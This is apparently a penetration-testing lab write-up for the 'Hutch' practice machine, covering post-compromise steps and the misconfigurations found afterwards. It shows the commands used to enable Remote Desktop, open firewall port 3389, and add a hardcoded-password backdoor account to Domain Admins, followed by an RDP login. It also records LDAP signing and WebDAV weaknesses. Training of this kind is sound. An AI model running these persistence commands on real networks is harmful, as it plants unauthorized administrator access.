Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system.
*Evil-WinRM* PS C:\Users\domainadmin\Documents> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ; netsh firewall add portopening TCP 3389 "Remote Desktop"
The operation completed successfully.
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
*Evil-WinRM* PS C:\Users\domainadmin\Documents> net user /ADD adm1n Qwer1234 /DOMAIN ; net group /domain "Domain Admins" /ADD adm1n
The command completed successfully.
The command completed successfully.┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0 RDP
LDAP
/Practice/Hutch/5-Privilege_Escalation/attachments/Pasted-image-20250501180252.png)
In the domain controller’s GP, Domain controller: LDAP server signing requirements is set to none
/Practice/Hutch/5-Privilege_Escalation/attachments/Pasted-image-20250501175957.png)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrity is set to 1
/Practice/Hutch/5-Privilege_Escalation/attachments/{7377B87E-651D-48F3-AB58-BBAED781B646}.png)
1 means it does not require channel binding
This is what allows unauthenticated access to the LDAP server
WebDAV
/Practice/Hutch/5-Privilege_Escalation/attachments/{DFE8AF8D-16AE-4240-9A8C-E23AE4C5198E}.png)
/Practice/Hutch/5-Privilege_Escalation/attachments/{7F757479-6E81-45B3-8C98-C73810E041CA}.png)
WebDAV is enabled and configured to grant all user both read and write access